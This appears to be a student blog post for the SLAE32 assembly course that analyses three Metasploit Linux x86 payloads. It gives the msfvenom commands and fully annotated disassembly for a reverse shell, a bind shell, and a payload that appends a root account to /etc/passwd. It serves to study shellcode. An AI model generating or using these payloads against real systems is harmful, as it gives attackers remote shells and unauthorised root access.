SLAE32 - Assignment 5

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments

Shellcode Analysis

This task asks students to disassemble and analyze at least three shellcode samples created by Metasploit, specifically those under the linux/x86 family. At the time of course creation, the tools msfpayload, msfencode, etc. had not yet been combined into msfvenom, which is what I'll use here.

Requirements:
  • Take up at least 3 shellcode samples created using Msfpayload for linux/x86
  • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
  • Present your analysis
I decided to perform analysis on the following three payloads:
  • shell_reverse_tcp (a non-staged reverse shell)
  • shell_bind_tcp (a non-staged bind shell)
  • adduser (a payload for adding a user, duh)
Although these aren't the most unique shellcodes, most other non-meterpreter payloads are, realistically, pretty simple. I chose the two Metasploit equivalents of tasks 1 and 2 to see how a well-optimized shellcode can perform similar tasks in fewer bytes. I went with ndisasm for the analysis of these shellcodes. It works well and accepts stdin.

shell_reverse_tcp

$ msfvenom -p linux/x86/shell_reverse_tcp RHOST=192.168.1.1 RPORT=4444 -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
[...]
00000040  B00B              mov al,0xb
00000042  CD80              int 0x80
68 bytes... That's impressive. My greenhorn linux reverse shell came in around 87 bytes, I think. That's not bad, but at the time I didn't see many ways to further optimize it. Comparing them now, optimizations are pretty clear.

Breaking down these shellcodes is easy if we separate them by syscalls. Below is the first snippet, until we encounter an int 0x80. The first call is to socketcall, or 0x66.
00000000  31DB              xor ebx,ebx  ; Zero out ebx
00000002  F7E3              mul ebx   ; eax * ebx = 0, so this zeroes both eax and edx (mul stores its result in edx:eax)
00000004  53                push ebx   ; push 0 onto the stack for socket() 'protocol' argument [NULL]
00000005  43                inc ebx   ; increase ebx to 1
00000006  53                push ebx   ; push 1 onto the stack for socket() 'type' argument [SOCK_STREAM]
00000007  6A02              push byte +0x2  ; push 2 onto the stack for socket() 'domain' argument [AF_INET]
00000009  89E1              mov ecx,esp  ; move the pointer to the arguments for socketcall into ecx
0000000B  B066              mov al,0x66  ; move the syscall 0x66 (102) for socketcall into eax
0000000D  CD80              int 0x80   ; make the syscall (ebx contains the value 1, or 'socket()', set at 0x00000005)
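As a rough cross-check of the three pushes, here is a minimal Python sketch that packs the same argument block that ecx points at. The helper name `socketcall_args` is hypothetical, and the constants assume a Linux x86 host where AF_INET is 2 and SOCK_STREAM is 1.

```python
import socket
import struct

SYS_SOCKET = 1  # socketcall sub-function number that ends up in ebx

def socketcall_args(domain, sock_type, protocol):
    """Pack the socket() arguments as they sit in memory, lowest address first."""
    return struct.pack("<3I", int(domain), int(sock_type), int(protocol))

# The shellcode pushes protocol, type, domain (in that order), so domain
# ends up at the lowest address, which is where ecx points.
args = socketcall_args(socket.AF_INET, socket.SOCK_STREAM, 0)
print(args.hex())
```

The twelve bytes printed are what the kernel reads through ecx when ebx is 1.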
The socket() setup is straightforward, but it packs in a lot of tricks and careful register reuse. The next bit of code is very clever. I thought my loop for dup2 was well made, and now I see this efficient beast:
0000000F  93                xchg eax,ebx  ; socket() returns the file descriptor for the new socket in eax; xchg is one byte shorter than a mov and puts it in ebx (dup2's first argument)
00000010  59                pop ecx   ; the last thing pushed to the stack was 0x02 at 0x00000007, pop that into ecx as the loop counter and dup2's second argument (newfd)
00000011  B03F              mov al,0x3f  ; mov the syscall 0x3F (63) into eax
00000013  CD80              int 0x80   ; call dup2, returning into eax on success
00000015  49                dec ecx   ; decrement ecx
00000016  79F9              jns 0x11   ; jump back to 0x00000011 while the SF flag is clear (ecx has not gone negative)
The above code acts as a very succinct dup2 loop, taking only nine bytes total, with the loop itself taking seven. Until I read this I didn't think that you could just rearrange the order of the required calls (dup2 before connect), but that makes quite a lot of sense now. In retrospect, I wouldn't have been able to come up with a reason as to why you couldn't.
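To make the loop's exit condition concrete, here is a small Python model of the `dec ecx` / `jns` pair. It is only a sketch of the control flow; the function name `dup2_loop_targets` is made up for illustration and no real descriptors are touched.

```python
def dup2_loop_targets(start):
    """Return the newfd values the loop passes to dup2, in order."""
    targets = []
    ecx = start
    while True:
        targets.append(ecx)  # int 0x80 with eax=0x3f: dup2(sockfd, ecx)
        ecx -= 1             # dec ecx sets SF once the result is negative
        if ecx < 0:          # jns only jumps while SF is clear
            break
    return targets

print(dup2_loop_targets(2))  # [2, 1, 0]
```

Starting from 2, the body runs for stderr, stdout and stdin before falling through.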

This next bit is responsible for calling 'connect()':
00000018  68C0A80110        push dword 0x1001a8c0 ; For the sockaddr struct, this is our IP in hex (bytes c0 a8 01 10 = 192.168.1.16)!
0000001D  680200115C        push dword 0x5c110002  ; Also for the sockaddr struct: AF_INET (0x0002) plus the port (bytes 11 5c = 0x115c = 4444)
00000022  89E1              mov ecx,esp   ; move the pointer for sockaddr into ecx
00000024  B066              mov al,0x66   ; move the syscall for socketcall() into eax
00000026  50                push eax    ; push eax (0x66) onto the stack, where it serves as the sockaddr length
00000027  51                push ecx    ; push the pointer to sockaddr struct onto the stack
00000028  53                push ebx    ; push the socket file descriptor onto the stack
00000029  B303              mov bl,0x3    ; set bl to 3, the socketcall number for connect() (ebx held the small socket fd, so its upper bytes are zero)
0000002B  89E1              mov ecx,esp   ; move the arguments for connect into ecx
0000002D  CD80              int 0x80    ; call connect!
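The two pushed dwords can be decoded mechanically. Below is a minimal Python sketch, with a hypothetical helper `decode_sockaddr_in`, that rebuilds the eight bytes as they sit in memory and reads them back as family, port and address.

```python
import socket
import struct

def decode_sockaddr_in(first_push, second_push):
    """first_push is the IP dword, second_push the family/port dword."""
    # The last value pushed sits at the lowest address, so it comes first.
    raw = struct.pack("<II", second_push, first_push)
    family = struct.unpack("<H", raw[0:2])[0]  # sin_family, host byte order
    port = struct.unpack(">H", raw[2:4])[0]    # sin_port, network byte order
    ip = socket.inet_ntoa(raw[4:8])            # sin_addr, network byte order
    return family, port, ip

print(decode_sockaddr_in(0x1001A8C0, 0x5C110002))  # (2, 4444, '192.168.1.16')
```

Note that the address decodes to 192.168.1.16 rather than the 192.168.1.1 given on the command line. Reverse payloads take LHOST/LPORT rather than RHOST/RPORT, so one plausible reading (an assumption on my part, the post does not say) is that the RHOST value was ignored and a default LHOST was used.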
This last bit is for actually executing the shell, via our good friend execve():
0000002F  52                push edx     ; push a NULL dword to terminate the string (edx was zeroed by mul at 0x00000002)
00000030  686E2F7368        push dword 0x68732f6e ;
00000035  682F2F6269        push dword 0x69622f2f ; pushing //bin/sh onto the stack (backwards)
0000003A  89E3              mov ebx,esp   ; move the pointer to //bin/sh into ebx
0000003C  52                push edx    ; push another NULL to terminate the argv array
0000003D  53                push ebx    ; push the address of //bin/sh onto the stack (argv[0])
0000003E  89E1              mov ecx,esp   ; move the pointer to argv into ecx
00000040  B00B              mov al,0xb    ; pass in the execve syscall number
00000042  CD80              int 0x80    ; call execve
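Reading strings out of pushed dwords by eye gets tedious, so here is a short Python sketch that does it. The helper name `pushed_string` is hypothetical; it takes the dwords in the order they are pushed.

```python
import struct

def pushed_string(*dwords):
    """Rebuild the in-memory bytes from dwords listed in push order."""
    # The stack grows downward, so the last dword pushed is read first.
    return b"".join(struct.pack("<I", d) for d in reversed(dwords))

print(pushed_string(0x68732F6E, 0x69622F2F))              # b'//bin/sh'
print(pushed_string(0x64777373, 0x61702F2F, 0x6374652F))  # b'/etc//passwd'
```

The second call uses the three dwords from the adduser payload; the doubled slash in both strings is padding that keeps each string a multiple of four bytes without introducing a null byte.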
There's nothing exceptionally different about how msf's shellcodes work, but they're clearly better optimized than my reverse shell was.

shell_bind_tcp

$ msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.1 LPORT=4444 -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
[...]
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80
Coming in at 78 bytes, this one has mine beat by.. oh, 30 bytes or so? RIP me.

Anyway, starting from the top, we find that the initial call for socketcall(), calling socket(), is identical to the reverse shell we just looked at. I guess I didn't expect this, and I'm not really sure why I didn't.
00000000  31DB              xor ebx,ebx  ; Zero out ebx
00000002  F7E3              mul ebx   ; eax * ebx = 0, so this zeroes both eax and edx (mul stores its result in edx:eax)
00000004  53                push ebx   ; push 0 onto the stack for socket() 'protocol' argument [NULL]
00000005  43                inc ebx   ; increase ebx to 1
00000006  53                push ebx   ; push 1 onto the stack for socket() 'type' argument [SOCK_STREAM]
00000007  6A02              push byte +0x2  ; push 2 onto the stack for socket() 'domain' argument [AF_INET]
00000009  89E1              mov ecx,esp  ; move the pointer to the arguments for socketcall into ecx
0000000B  B066              mov al,0x66  ; move the syscall 0x66 (102) for socketcall into eax
0000000D  CD80              int 0x80   ; make the syscall (ebx contains the value 1, or 'socket()', set at 0x00000005)
Moving on, the next portion of the shellcode is responsible for calling bind():
0000000F  5B                pop ebx    ; pop 0x02 into ebx for bind()
00000010  5E                pop esi    ; pop 0x01 into esi for later
00000011  52                push edx    ; start our sockaddr struct by pushing a zero dword (sin_addr = 0.0.0.0, INADDR_ANY)
00000012  680200115C        push dword 0x5c110002  ; push our port (bytes 11 5c = 0x115c = 4444) and AF_INET (0x02) onto the stack
00000017  6A10              push byte +0x10   ; push the size of the sockaddr struct
00000019  51                push ecx    ; push the sockaddr struct address (clever stack manipulation, ecx was set before the socket() call!)
0000001A  50                push eax    ; push the socket file descriptor returned from socket()
0000001B  89E1              mov ecx,esp   ; move the address of arguments into ecx
0000001D  6A66              push byte +0x66   ;
0000001F  58                pop eax    ; push / pop (3 bytes) sets all of eax and is shorter than the 5-byte mov eax,0x66
00000020  CD80              int 0x80    ; call bind()
This one struck me. Initially, the instruction at 0x00000019 blew my mind, but after stepping through it, it made total sense. This instruction is intended to put the address of the sockaddr struct onto the stack, yet it's just pushing ecx... Well, as it turns out, ecx still holds the address it was given before the socket() call! The two pops remove 0x02 and 0x01, and the two pushes that follow write the sockaddr struct into those same eight bytes, so the struct lands exactly where ecx already points. Some clever stack play lets us simply reuse the register without modification. That's pretty slick! It also got my wheels turning on making shellcode more efficient through techniques like these.
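The register reuse is easier to believe after tracing it. The following Python sketch models a downward-growing stack with an arbitrary starting address (the `Stack` class and the 0x1000 base are illustrative assumptions, not anything from the payload) and replays the pushes and pops up to 0x00000012.

```python
class Stack:
    """Tiny model of a 32-bit stack; addresses are arbitrary."""
    def __init__(self, esp=0x1000):
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

s = Stack()
s.push(0)            # 0x04: protocol
s.push(1)            # 0x06: SOCK_STREAM
s.push(2)            # 0x07: AF_INET
ecx = s.esp          # 0x09: mov ecx,esp
ebx = s.pop()        # 0x0F: pop ebx -> 2 (bind)
esi = s.pop()        # 0x10: pop esi -> 1
s.push(0)            # 0x11: push edx -> INADDR_ANY
s.push(0x5C110002)   # 0x12: family + port
print(ecx == s.esp, hex(s.mem[ecx]), s.mem[ecx + 4])
```

After the last push, esp is back at the address saved in ecx, and the eight bytes there are now the sockaddr struct.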

Next, we go to listen(), or 0x04:
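00000022  894104            mov [ecx+0x4],eax  ; ecx still points at the bind() arguments; eax is 0 after a successful bind(), so this overwrites the second argument with 0 (backlog)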
00000025  B304              mov bl,0x4   ; move 0x4 (listen) into bl
00000027  B066              mov al,0x66  ; move socketcall into eax
00000029  CD80              int 0x80   ; call socketcall()
For the listen() function, a small stack manipulation is made at 0x00000022, simply to pass a zero in as the 'backlog' parameter. ECX already points to the socket file descriptor left over from the bind() arguments, so otherwise we're good to go!

Next up, a simple accept() call:
0000002B  43                inc ebx   ; increase ebx to 0x5 (accept)
0000002C  B066              mov al,0x66  ;
0000002E  CD80              int 0x80   ; call socketcall!
After calling accept, we move to the last two pieces: the dup2 loop, which is essentially the same highly optimized code we saw in the reverse shell (here using push / pop to load 0x3f), and the call to execve, which also mirrors the reverse shell. For that reason, most of it isn't annotated.
00000030  93                xchg eax,ebx   ; save the file descriptor from accept()
00000031  59                pop ecx    ; pop the initial FD from socket (pushed to the stack @ 0000001A)
00000032  6A3F              push byte +0x3f   ; start the dup2 loop
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  49                dec ecx
00000038  79F8              jns 0x32    ; dup2 loop ends
0000003A  682F2F7368        push dword 0x68732f2f  ; execve starts
0000003F  682F62696E        push dword 0x6e69622f
00000044  89E3              mov ebx,esp
00000046  50                push eax
00000047  53                push ebx
00000048  89E1              mov ecx,esp
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80    ; call execve!
Looking at the bind and the reverse shells, after a bit of getting this under my belt, it makes sense that there would be so much code reuse. The shellcodes once seemed so mysterious, but now I can see their immense similarities.

adduser

Rather than walk through some semi-similar staged shells, I wanted to take a quick glance at how msf handles adding a user via shellcode.
$ msfvenom -p linux/x86/adduser -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes

00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx
[...]
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80
The first syscall is 0x46 (70), which on i386 is setreuid() rather than setgid() (setgid is 46 decimal, or 0x2e). With ebx and ecx both zero, the call is setreuid(0, 0).
00000000  31C9              xor ecx,ecx  ; zero out ecx
00000002  89CB              mov ebx,ecx  ; zero out ebx
00000004  6A46              push byte +0x46  ; push 0x46 onto the stack
00000006  58                pop eax   ; pop it into eax
00000007  CD80              int 0x80   ; call setreuid(0, 0)
After setreuid, we see the following:
00000009  6A05              push byte +0x5    ; push 0x5 onto the stack
0000000B  58                pop eax     ; pop that value into eax for open() syscall
0000000C  31C9              xor ecx,ecx    ; zero out ecx
0000000E  51                push ecx     ; push a zero onto the stack
0000000F  6873737764        push dword 0x64777373  ;
00000014  682F2F7061        push dword 0x61702f2f  ;
00000019  682F657463        push dword 0x6374652f  ; push /etc//passwd onto the stack
0000001E  89E3              mov ebx,esp    ; move the pointer to /etc//passwd into ebx
00000020  41                inc ecx     ; increase ecx to 0x1
00000021  B504              mov ch,0x4     ; set the high byte of cx to 0x4, making ecx 0x401 (O_WRONLY | O_APPEND)
00000023  CD80              int 0x80     ; call open()
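The flag value built by `inc ecx` and `mov ch,0x4` can be checked against the Linux x86 open(2) constants. The sketch below writes those constants out by hand so it does not depend on the host OS; `describe_flags` is a hypothetical helper that only knows the handful of flags relevant here.

```python
# Linux x86 open(2) flag values (octal 01, 0400 and 02000 in the headers)
O_WRONLY = 0x001
O_NOCTTY = 0x100
O_APPEND = 0x400

def describe_flags(flags):
    """Name the access mode and the two flag bits this sketch knows about."""
    access = {0: "O_RDONLY", 1: "O_WRONLY", 2: "O_RDWR"}.get(flags & 3, "invalid")
    extra = [name for name, bit in (("O_NOCTTY", O_NOCTTY), ("O_APPEND", O_APPEND))
             if flags & bit]
    return [access] + extra

ecx = 0
ecx += 1            # inc ecx
ecx |= 0x04 << 8    # mov ch,0x4 writes bits 8-15 of ecx
print(hex(ecx), describe_flags(ecx))  # 0x401 ['O_WRONLY', 'O_APPEND']
```

Bit 0x400 is O_APPEND, which fits a payload that appends a line to an existing file; O_NOCTTY would be 0x100.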
Next, if you look at the shellcode and think wtf, you're not wrong. After a quick xchg and a call, this section is a jumble because it's actually ASCII data we're looking at, not legitimate instructions.
00000025  93                xchg eax,ebx  ; xchg the file descriptor that open() returned into ebx
00000026  E828000000        call 0x53   ; call 0x53, skipping all the junk and pushing its address (0x2B) onto the stack
0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
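Treating the bytes from 0x2B through 0x52 as text instead of instructions makes the "junk" readable. A minimal Python sketch, with the 40 bytes copied from the hex column of the listing above:

```python
# Bytes 0x2B..0x52 of the payload, taken from the hex column of the listing
DATA = bytes.fromhex(
    "6d65746173706c6f69743a417a2f6449"
    "736a3470344952633a303a303a3a2f3a"
    "2f62696e2f73680a"
)

line = DATA.decode("ascii")
fields = line.rstrip("\n").split(":")
print(len(DATA), fields)
```

The result is a single /etc/passwd entry with seven colon-separated fields: user name, password hash, UID 0, GID 0, an empty comment field, home directory `/` and shell `/bin/sh`.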
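So, we xchg the file descriptor and call the next part of the legit payload, starting at offset 0x53. Because ndisasm decoded the embedded string as instructions, the listing is out of sync by the time it reaches the real code (the bogus instruction at 0x52 swallows the pop ecx at 0x53), and we can't get an accurate disassembly moving forward without going at it by hand. But ndisasm has a -k option, which skips a given number of bytes starting at a given offset. Skipping 40 (0x28) bytes from offset 43 (0x2B) works here: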
$ msfvenom -p linux/x86/adduser -f raw | ndisasm -u -k 43,40 -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes

00000000  31C9              xor ecx,ecx
[...]
00000025  93                xchg eax,ebx
00000026  E828000000        call 0x53
0000002B  skipping 0x28 bytes
00000053  59                pop ecx
00000054  8B51FC            mov edx,[ecx-0x4]
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80
That's much cleaner! Starting from 0x00000053, we have the syscall for write with its associated arguments: the file descriptor from open() in ebx, the pointer to the string in ecx, and the count in edx.
00000053  59                pop ecx    ; pop the location of the string into ecx (call leaves it on the stack!)
00000054  8B51FC            mov edx,[ecx-0x4] ; load the string's length into edx: the four bytes before the string are the call's operand, 0x28 (40)
00000057  6A04              push byte +0x4   ;
00000059  58                pop eax    ; pop 0x4 (write) into eax
0000005A  CD80              int 0x80    ; call write()
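The length trick works because the call's 32-bit relative operand doubles as the byte count. Here is a short Python sketch of the arithmetic, using the five bytes at offset 0x26 from the listing; the variable names are my own.

```python
import struct

CALL = bytes.fromhex("e828000000")  # bytes at offset 0x26: call rel32
CALL_OFFSET = 0x26

rel32 = struct.unpack("<i", CALL[1:5])[0]
return_addr = CALL_OFFSET + len(CALL)  # pushed by call, later popped into ecx
target = return_addr + rel32           # where execution continues
operand_addr = CALL_OFFSET + 1         # where the rel32 itself is stored

print(hex(return_addr), hex(target), rel32)  # 0x2b 0x53 40
print(operand_addr == return_addr - 4)       # True
```

Since the operand sits at ecx-4 and the distance jumped equals the size of the data being skipped, `mov edx,[ecx-0x4]` yields 40 with no extra bytes spent on a length constant. The same two numbers, 43 and 40, are the arguments given to ndisasm's -k option.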
Lastly, we call sys_exit with a push, pop.
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80
And that's it for assignment 5!
